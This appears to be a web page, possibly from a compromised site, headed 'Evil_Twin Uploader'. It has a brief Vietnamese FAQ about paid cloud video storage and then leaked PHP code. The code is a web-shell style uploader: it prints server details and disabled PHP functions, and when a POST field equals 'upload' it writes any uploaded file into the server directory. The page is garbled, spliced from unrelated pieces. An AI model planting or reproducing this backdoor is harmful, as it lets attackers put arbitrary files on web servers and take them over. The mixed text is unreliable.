Evil_Twin Uploader

Tôi có thể lưu dữ liệu video lên dịch vụ lưu trữ đám mây không?

Có! Bạn có thể lưu trữ dữ liệu video của mình lên bộ lưu trữ đám mây liên tục 24/7. Tuy nhiên bạn sẽ phải trả phí khi sử dụng dịch vụ này.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial